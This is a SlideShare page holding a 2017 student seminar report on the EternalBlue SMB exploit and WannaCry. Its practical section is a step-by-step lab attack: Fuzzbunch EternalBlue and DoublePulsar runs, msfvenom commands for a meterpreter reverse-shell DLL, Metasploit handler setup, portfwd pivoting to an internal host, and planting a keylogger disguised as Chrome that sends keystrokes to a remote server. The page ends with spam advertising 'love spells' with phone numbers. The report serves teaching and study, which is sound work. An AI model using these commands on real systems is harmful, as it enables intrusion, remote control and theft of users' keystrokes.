SlideShare a Scribd company logo

The EternalBlue Exploit: how it works and affects systems

A
Andrea Bissoli

The purpose of this report is to focus on one particular aspect of a WannayCry malware in order to understand which vulnerability it ex- ploited and how it is spread into the internet. In the report it will be shown EternalBlue attack and how it is possible to take the pc control thanks to DoublePulsar attack and Meterpreter session. Than it is shown a study case in which it is performed a pivoting attack. In the end it is injected simple keyloggers in the machines attacked in order to take some useful informations.

Software
1 of 19
Download to read offline
Seminars in Advanced Topics in Engineering in Computer Science - The EternalBlue Exploit: how it works and affects systems Andrea Bissoli - 1543640 November 15, 2017 Abstract The purpose of this report is to focus on one particular aspect of a WannayCry malware in order to understand which vulnerability it ex- ploited and how it is spread into the internet. In the report it will be shown EternalBlue attack and how it is possible to take the pc control thanks to DoublePulsar attack and Meterpreter session. Than it is shown a study case in which it is performed a pivoting attack. In the end it is injected simple keyloggers in the machines attacked in order to take some useful informations. 1 Introduction Before to start with implementation, code and technical terms we have to un- derstand the political scene and the events happened during last year. 1.1 Scenario explanation In the following bullet there are summarized the events happened during last year. This give us a complete picture of the situation, and it is easy to under- stand the choices did by each party of the game [11] [10] [7] [1]: • August 2016: The Shadow Brokers, a mysterious online hackers group, claimed to have infiltrated the Equation Group, an elite hacking unit linked to the National Security Agency. It released a few taster files and images of the cache. The leak, announced in broken English by the group in a series of posts on Twitter, Tumblr, Pastebin and Github, was ac- companied by claims that the group was in possession of state-sponsored cyber weapons. Zero-day presented in the released archieve is of the old Cisco, than the Shadow Brokers launched an auction to sell the archive to the highest bidder. 1
• December 2016: In December the Shadow Brokers deleted auction and offered direct sales. • January 2017: No one bought the Shadow Brokers’ archive. They de- cided to show lost Equation Group 2013 Windows Ops Disk screenshots . The Shadow Brokers knew if they released these information the vulnera- bilities should be reported by the Equation Group to Microsoft and they should be patched. • February 2017: Microsoft missed to make patches for EternalBlue at- tack. • March 2017: Microsoft released path for SMB vulnerability to prevent EternalBlue attack. Also Oracle patched some vulnerabilities. • April 2017: Having failed to make their price, the Shadow Brokers re- leased the password for the encrypted archive. In mid-April of 2017, the Shadow Brokers dumped a cache they claimed belonged to the NSA, and an assortment of sophisticated network exploitation tools was instantly available for anyone to reverse engineering and use. For a brief moment in time, many researchers felt like kids in a candy store. It quickly became apparent that the exploits were antiques and had all been patched, or were for ancient systems. So the defenders moved on, the attackers did not move on; they realized that even though the defenders thought the systems were safe against these non-zero-day, unexciting attacks, we were not. The fact is that Eternal exploits was not zero-day vulnerability, because Microsoft patched it 30 days before the actual release, the problem was that not all systems in the word did a last updating. • May 2017: Thanks to mid-April release WannaCry is launched. • June 2017: In June, The Shadow Brokers announced ”The Shadow Bro- kers Data Dump of the Month” service. They launched a new monthly subscription model. Each month peoples can pay membership fee, then the club’s members get data dump for each month. Monthly Data Dump could be: web browser, router, handset exploits and tools, select items from newer Ops Disks, including newer exploits for Windows 10, compromised network data from more SWIFT providers and Central banks,compromised network data from Russian, Chinese, Iranian, or North Korean nukes and missile programs. In the end, Rapid7 studied to determine what hosts on the public IPv4 Internet are exposing SMB endpoints and to attempt to gather publicly available information from them. They scanned 139/TCP and 445/TCP ports (the SMB ones). They found over 4 million hosts with one or both of the SMB ports open, as seen in the following figure: 2
1.2 WannaCry explanation and MS17-010 vulnerability WannaCry is composed by two modules: ransomware and worm. A ransomware is a malicious software [9] which covertly encrypts your files, preventing you from accessing them, then demands payment for their safe recovery. WannaCry ransomware deviates from the traditional ransomware definition by including a component that is able to find vulnerable systems on a local network and spread that way as well. This type of malicious software behaviour is called a worm. EternalBlue [8] is a worm used by WannaCry and it can spread from device to device on a network via port 445, thanks to the SMB vulnerability. While Microsoft patched it with update MS17-010[5], many computers have not been updated and remain vulnerable. EternalBlue exploits a vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE- 2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various ver- sions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target com- puter. SMB is a network file sharing protocol that allows applications on a computer to read and write (in)to files and request services from server programs in a com- puter network. It is basically the default way computers are remotely managed in any environment, so a vulnerability in it has a huge impact. 3
2 Setting up the practical scenario Now we are going to see the study case taken in consideration. First of all it will be seen how the networks is made, which O.S. is running on each computer and how to install secondary tools. It will be exposed the attack vector, that is the steps done to reach the goal and in the end the implementations of two keyloggers. 2.1 Environment setting In our environment there are three computers: • Kali Linux as attack machine running Fuzzbunch and metasploit frame- work. IP: 191.168.1.164 • Windows 7 64-bit as pivot vulnerable host with two adapters. IP: 10.10.10.134 and 191.168.1.134 • Windows 7 64-bit as target vulnerable host. IP: 10.10.10.175 In the following picture it get see a graphic representation: Kali Linux setting In the Kali Linux machine we have to install two tools: Fuzzbunch metasploit and Metasploit framework. One of the elements in the ShadowBrokers data dump is Fuzzbunch. Fuzzbunch 4
can be compared to MetaSploit but it is written in Python instead of Ruby. It’s an easy to use framework for the operator in order to launch exploits and interact with the implants. The FuzzBunch framework contains several ready to use exploits, each for specific types of targets. Thanks to this guide[4] it can be possible to install Fuzzbunch on Kali Linux. Regarding Metasploit framework it is installed yet. Windows 7 64-bit setting Regarding Windows 7 computers it is not necessary to install anything. 2.2 Attack vector The implemented attack vector is the following: 1. Take control of the pivot machine thanks Eternalblue and DoublePulsar attack. 2. Upload the keylogger into pivot machine. 3. Through pivot machine take target machine control. This is made thanks to port forwarding and proxy into pivot machine. 4. Upload the keylogger into target machine. Keylogger is made in such a way to put it into browser folder, rename it with the browser name, and when the victim launches browser it launches keylogger, than it starts the actual browser. Every time then the keylogger goes up it sends the log file to a remote server. It does an HTTP POST, since in c++ it is difficult do an HTTP POST, I did it with four lines in python and then with a tool it is transformed in a executable file. Hence, inside the keylogger is called this module to send keystrokes to the server. 2.3 Keylogger: theory and implementation Keylogging, often referred to as Keyboard Capturing or Keystroke logging, is the action of recording or monitoring every key pressed on a keyboard[2]. There are several basic technologies which can be used to intercept keystrokes and mouse events, and many keyloggers use these technologies [3]. The main idea behind keyloggers is to get in between any two links in the chain of events between when a key is pressed and when information about that keystroke is displayed on the monitor. This can be achieved using video surveillance, a hardware bug in the keyboard, wiring or the computer itself, intercepting input/ output, substituting the keyboard driver, the filter driver in the keyboard stack, intercepting kernel functions by any means possible (sub- stituting addresses in system tables, splicing function code, etc.), intercepting DLL functions in user mode, and, finally, requesting information from the key- board using standard documented methods. 5
The most common methods used to construct keylogging software are the fol- lowing: • a system hook which intercepts notification that a key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C); So for the first part we hook the keyboard input in order to get it too: Then, in the handlekeys function implements the keylogging logic, this means get keystrokes and save into log file. • a cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState most often written in Visual Basic, sometimes in Borland Delphi); For this type of keylogger the main part is the following: • using a filter driver (requires specialized knowledge and is written in C). 6
3 The practical case Now, we will see how the attack is implemented. So for the first part it is shown the first hop attack, than the more interesting one, so how to pivoting the first machine [6]. 3.1 First hop The target of this attack is the first computer, that is the pivot machine. 3.1.1 Open Fuzzbuch and launch Eternalblue attack Open Fuzzbuch through this command: #!/bin/bash export WINEPREFIX= $HOME/.wine-fuzzbunch cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows wine cmd.exe python fb.py 7
and set Default Target IP (pivot’s IP) and Default Callback IP Address (at- tacker’s IP) as followspoint: Now we can use a Eternalblue moduel attack, so type: use eternalblue Most of the settings are defaults, but be careful when it comes time to define the delivery mechanism. Be sure to select ”Traditional deployment from within FUZZBUNCH” here: At this point we are ready to run the exploit. If everything is setup correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if you are sure the host is vulnerable: 8
3.1.2 Build dll to inject Once the Eternalblue exploit is succesful, the next step is to use the Doublepul- sar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom and to make things easier we will generate the payload in the directory that fuzzbunch is launched from: cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows msfvenom -p windows/x64/meterpreter/reverse tcp lhost=192.168.1.164 lport=45467 - platform windows -f dll -o file.dll 9
3.1.3 Prepare Metasploit framework We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected by using exploit/multi/handler, making sure the payload, lport and lhost match our msfvenom command from the previous step. So the commands are: masfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse tcp set LHOST 192.168.1.164 set LPORT 45467 run and in the end we will have: 3.1.4 Run DoublePulsar attack The next step is to run DoublePulsar and inject the malicious launcher.dll file. Type the following command in Fuzzbunch to use DoublePulsar: use doublepular In our private practice lab we are targeting a 64-bit vulnerable Windows 7 installation. In this case we need to change the default settings for the architec- ture to 64 bit and keep all other variables default until we reach the Function settings. 10
Instead of the default option for the Function variable we choose to inject and run a DLL. You have probably guessed already that we are injecting the malicious DLL that we have generated with Empire earlier. Choose option 2 from the function settings. Then we need to enter the location of the DLL file and some other options we can leave as default. Choose the default options for all other variable settings until Fuzzbunch asks us if we want to execute DoublePulsar. If all was successful the output should look like: 3.1.5 Wait and use meterpreter When we switch to the handler listener we should have a reverse shell from the pivot host which we can no interact with: 11
3.2 Second hop Once the pivot hosts externally facing service is compromised and a meterpreter shell is achieved, we want to reach internal network in order to compromise also others computers. 3.2.1 Set pivoting To reach out target we need to configure portfwd to relay traffic to internal hosts. The command in this case would be: portfwd add -l 9000 -p 445 -r 10.10.10.183 The breakdown of the command is like this: • -l 9000 : The port that will receive the traffic on the attacker host • -p 445 : The port on the internal victim that will be accessed • -r 10.10.10.183 : The internal victim, that is our target Once the the portfwd is established, the attacker machine is listening on port 9000 and anything sent to that port will reach the internal victim on the defined destination port (445). 3.2.2 Open Fuzzbuch and launch Eternalblue attack Like above, open Fuzzbuch through this command: #!/bin/bash export WINEPREFIX= $HOME/.wine-fuzzbunch cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows wine cmd.exe python fb.py 12
and set Default Target IP (pivot’s IP) and Default Callback IP Address (at- tacker’s IP). Now, the Default Target IP will be 127.0.0.1 because all traffic for target will pass through attacker localhost. 13
Now we can use a Eternalblue moduel attack, so type: use eternalblue Most of the settings are defaults, but be careful when it comes time to define the target port. In this case we have to use the local port defined in the portfwd command, 9000, as Eternalblue will default to 445. Hit enter at the Prompt for Variable Settings prompt to enter the new target port: The next setting that will deviate from the defaults is the delivery mech- anism. Be sure to select Traditional deployment from within FUZZBUNCH here: 14
At this point were ready to run the exploit. If everything is setup correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if youre sure the host is vulnerable: 15
3.2.3 Build dll to inject Once the Eternalblue exploit is succesful, the next step is to use the Doublepul- sar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom and to make things easier we will generate the payload in the directory that fuzzbunch is launched from: cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows msfvenom -p windows/x64/meterpreter/reverse tcp lhost=192.168.1.164 lport=9000 - platform windows -f dll -o file2.dll 3.2.4 Prepare Metasploit framework We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected by using exploit/multi/handler, in this case we don’t have match with the above options (lport,lhost) because the informations flow from target to pivot and from pivot to attacker. Hence we have to set a port set in the netsh command above. So the commands are: masfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse tcp set LHOST 192.168.1.164 set LPORT 9000 run and in the end we will have: 3.2.5 Run DoublePulsar attack Next, from fuzzbunch run ”use doublepulsar”. Be sure that the target port matches (9000 in this case). Once configured, it should look something like this: 16
If all was successful the output should look like: 3.2.6 Wait and use meterpreter When we switch to the handler listener we should have a reverse shell from the target host which we can no interact with: 17
3.3 Keylogger injection In order to put the keylogger inside the machines we have to follow these com- mands. The goal is to upload into the browser directory the malicious files. One is the actual keylogger, the other one is the send data module. In the end we will have an actual browser renamed with browser olde.exe and the malicious one will be browser.exe and send data.exe. shell cd C:”Program Files (x86)”GoogleChromeApplication rename chrome.exe chrome old.exe upload /root/Desktop/send data.exe C:”Program Files (x86)” GoogleChromeApplication upload /root/Desktop/send data.exe C: ”Program Files (x86)” Google ChromeApplication Now, we have to wait that user opens the browser and keylogger sends statistics to the server. 4 Conclusions We have seen how Fuzzbunch wiht EternalBlue and Doublepulsar is a strong and powerful metasploit framwork. Furthermore we have seen how to perfom pivoting with these tools. How we can see it easy enters in a computer has this vulnerability, and also it enters in the internal networks. This bug was patched but today 4 millions public IPs are still vulnerable, so they can be attacked. Moreover if an attacker is able to enter in a company computer with other techniques (such as phishing etc..), and if the internal network corporation cannot upload its internal pc, the malicious person can enter with technique seen above. 18
References [1] Rebekah Brown. The Shadow Brokers Leaked Exploits Explained. Ed. by rapid7. url: https://blog.rapid7.com/2017/04/18/the-shadow- brokers-leaked-exploits-faq/ (visited on 2017). [2] Nikolay Grebennikov. Keyloggers: How they work and how to detect them. Ed. by AO Kaspersky Lab. url: https://securelist.com/analysis/ publications / 36138 / keyloggers - how - they - work - and - how - to - detect-them-part-1/ (visited on 2007). [3] Nikolay Grebennikov. Keyloggers: Implementing keyloggers in Windows. Part Two. Ed. by AO Kaspersky Lab. url: https://securelist.com/ analysis/publications/36358/keyloggers-implementing-keyloggers- in-windows-part-two/ (visited on 2011). [4] mdiazcl. Kali/fuzzbunch-debian deployment guide. url: https://github. com/mdiazcl/fuzzbunch-debian (visited on 2017). [5] Microsoft. Microsoft Security Bulletin MS17-010 - Critical. Ed. by Mi- crosoft. url: https : / / technet . microsoft . com / en - us / library / security/ms17-010.aspx (visited on 2017). [6] Joe Norton. Running Fuzzbunch on Kali Through a Meterpreter Port For- ward. url: https://medium.com/@joe_norton/running-eternalblue- on-kali-through-a-meterpreter-port-forward-edd877dfd724 (vis- ited on 2017). [7] Jon Hart Dustin Myers Vasudha Shivamoggi Philip Thomsen Rebekah Brown Bob Rudis. 2017 Q2 RAPID7 QUARTERLY THREAT REPORT. Ed. by rapid7. url: https://information.rapid7.com/rs/411-NAK- 970/images/rapid7-2017Q2-threat-report.pdf (visited on 2017). [8] Tom Reeve. WannaCry not first to exploit NSA EternalBlue, DoublePul- sar malware. Ed. by scmagazineuk. url: https://www.scmagazineuk. com/wannacry-not-first-to-exploit-nsa-eternalblue-doublepulsar- malware/article/661887/ (visited on 2017). [9] boB Rudis. Wanna Decryptor (WNCRY) Ransomware Explained. Ed. by rapid7. url: https : / / blog . rapid7 . com / 2017 / 05 / 12 / wanna - decryptor-wncry-ransomware-explained/ (visited on 2017). [10] theguardian. Hacking group auctions ’cyber weapons’ stolen from NSA. Ed. by theguardian. url: https://www.theguardian.com/technology/ 2016/aug/16/shadow-brokers-hack-auction-nsa-malware-equation- group (visited on 2016). [11] theshadowbrokers. OH LORDY! Comey Wanna Cry Edition. Ed. by steemit. url: https://steemit.com/shadowbrokers/@theshadowbrokers/oh- lordy-comey-wanna-cry-edition (visited on 2017). 19

Recommended

Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability
kandelrc
 
IP Addressing
IP AddressingIP Addressing
IP Addressing
Kishore Kumar
 
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Sam Bowne
 
DDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDNDDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDN
Chao Chen
 
Nat pat
Nat patNat pat
Nat pat
CYBERINTELLIGENTS
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
Marco Morana
 
How to Configure QinQ?
How to Configure QinQ?How to Configure QinQ?
How to Configure QinQ?
Huanetwork
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 

Recommended

Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability
kandelrc
 
IP Addressing
IP AddressingIP Addressing
IP Addressing
Kishore Kumar
 
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Sam Bowne
 
DDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDNDDoS Attack Detection & Mitigation in SDN
DDoS Attack Detection & Mitigation in SDN
Chao Chen
 
Nat pat
Nat patNat pat
Nat pat
CYBERINTELLIGENTS
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
Marco Morana
 
How to Configure QinQ?
How to Configure QinQ?How to Configure QinQ?
How to Configure QinQ?
Huanetwork
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
Acl avancée
Acl avancéeAcl avancée
Acl avancée
Kawtar Zerhouni
 
Chapter 1.ppt
Chapter 1.pptChapter 1.ppt
Chapter 1.ppt
ssuserec53e73
 
Subnetting
SubnettingSubnetting
Subnetting
selvakumar_b1985
 
Secure Coding and Threat Modeling
Secure Coding and Threat ModelingSecure Coding and Threat Modeling
Secure Coding and Threat Modeling
Miriam Celi, CISSP, GISP, MSCS, MBA
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
Andy Lee
 
DNS Attacks
DNS AttacksDNS Attacks
DNS Attacks
Himanshu Prabhakar
 
IP addressing seminar ppt
IP addressing seminar pptIP addressing seminar ppt
IP addressing seminar ppt
Smriti Rastogi
 
Ip address and subnetting
Ip address and subnettingIp address and subnetting
Ip address and subnetting
IGZ Software house
 
Ad-Hoc Networking in Linux with Avahi
Ad-Hoc Networking in Linux with AvahiAd-Hoc Networking in Linux with Avahi
Ad-Hoc Networking in Linux with Avahi
sinchume
 
KHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack PreventionKHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack Prevention
APNIC
 
IPV4 vs IPV6
IPV4 vs IPV6IPV4 vs IPV6
IPV4 vs IPV6
Devang Doshi
 
Secure Socket Layer
Secure Socket LayerSecure Socket Layer
Secure Socket Layer
Naveen Kumar
 
Ch03 Ch06 Des And Others
Ch03 Ch06 Des And OthersCh03 Ch06 Des And Others
Ch03 Ch06 Des And Others
nathanurag
 
Message AUthentication Code
Message AUthentication CodeMessage AUthentication Code
Message AUthentication Code
Keval Bhogayata
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasures
karanwayne
 
Ip Addressing Basics
Ip Addressing BasicsIp Addressing Basics
Ip Addressing Basics
tmavroidis
 
EMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deployments
EMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deploymentsEMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deployments
EMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deployments
Aruba, a Hewlett Packard Enterprise company
 
Aircrack
AircrackAircrack
Aircrack
MuhammadHanzalah6
 
Ike
IkeIke
Ike
shashi712
 
Formative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering AttacksFormative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering Attacks
DamaineFranklinMScBE
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
BHack Conference
 

More Related Content

What's hot

Ch03 Ch06 Des And Others
Ch03 Ch06 Des And OthersCh03 Ch06 Des And Others
Ch03 Ch06 Des And Others
nathanurag
 

What's hot (20)

Acl avancée
Acl avancéeAcl avancée
Acl avancée
 
Chapter 1.ppt
Chapter 1.pptChapter 1.ppt
Chapter 1.ppt
 
Subnetting
SubnettingSubnetting
Subnetting
 
Secure Coding and Threat Modeling
Secure Coding and Threat ModelingSecure Coding and Threat Modeling
Secure Coding and Threat Modeling
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
 
DNS Attacks
DNS AttacksDNS Attacks
DNS Attacks
 
IP addressing seminar ppt
IP addressing seminar pptIP addressing seminar ppt
IP addressing seminar ppt
 
Ip address and subnetting
Ip address and subnettingIp address and subnetting
Ip address and subnetting
 
Ad-Hoc Networking in Linux with Avahi
Ad-Hoc Networking in Linux with AvahiAd-Hoc Networking in Linux with Avahi
Ad-Hoc Networking in Linux with Avahi
 
KHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack PreventionKHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack Prevention
 
IPV4 vs IPV6
IPV4 vs IPV6IPV4 vs IPV6
IPV4 vs IPV6
 
Secure Socket Layer
Secure Socket LayerSecure Socket Layer
Secure Socket Layer
 
Ch03 Ch06 Des And Others
Ch03 Ch06 Des And OthersCh03 Ch06 Des And Others
Ch03 Ch06 Des And Others
 
Message AUthentication Code
Message AUthentication CodeMessage AUthentication Code
Message AUthentication Code
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasures
 
Ip Addressing Basics
Ip Addressing BasicsIp Addressing Basics
Ip Addressing Basics
 
EMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deployments
EMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deploymentsEMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deployments
EMEA Airheads- Instant AP- APP REF and Mixed IAP Cluster deployments
 
Aircrack
AircrackAircrack
Aircrack
 
Ike
IkeIke
Ike
 

Similar to The EternalBlue Exploit: how it works and affects systems

Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Aaron ND Sawmadal
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Aaron ND Sawmadal
 
Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3
Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3
Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3
IJERA Editor
 
The Year the Internet Fell Apart
The Year the Internet Fell ApartThe Year the Internet Fell Apart
The Year the Internet Fell Apart
IBM Security
 
A comprehensive survey ransomware attacks prevention, monitoring and damage c...
A comprehensive survey ransomware attacks prevention, monitoring and damage c...A comprehensive survey ransomware attacks prevention, monitoring and damage c...
A comprehensive survey ransomware attacks prevention, monitoring and damage c...
RSIS International
 
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
AshishDPatel1
 
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
RSIS International
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_Spyware
Shan Kumar
 
Malware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things MalwareMalware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things Malware
Cyphort
 

Similar to The EternalBlue Exploit: how it works and affects systems (20)

Formative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering AttacksFormative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering Attacks
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3
Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3
Exploring the Social Engineering Toolkit (Set) Using Backtrack 5R3
 
The Year the Internet Fell Apart
The Year the Internet Fell ApartThe Year the Internet Fell Apart
The Year the Internet Fell Apart
 
A comprehensive survey ransomware attacks prevention, monitoring and damage c...
A comprehensive survey ransomware attacks prevention, monitoring and damage c...A comprehensive survey ransomware attacks prevention, monitoring and damage c...
A comprehensive survey ransomware attacks prevention, monitoring and damage c...
 
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
 
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
A Comprehensive Survey: Ransomware Attacks Prevention, Monitoring and Damage ...
 
News bytes Oct-2011
News bytes Oct-2011News bytes Oct-2011
News bytes Oct-2011
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12
 
RIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdfRIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdf
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)
 
Stuxnet - A weapon of the future
Stuxnet - A weapon of the futureStuxnet - A weapon of the future
Stuxnet - A weapon of the future
 
ransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptx
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_Spyware
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Malware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things MalwareMalware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things Malware
 

Recently uploaded

Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
chiefasafspells
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
masabamasaba
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
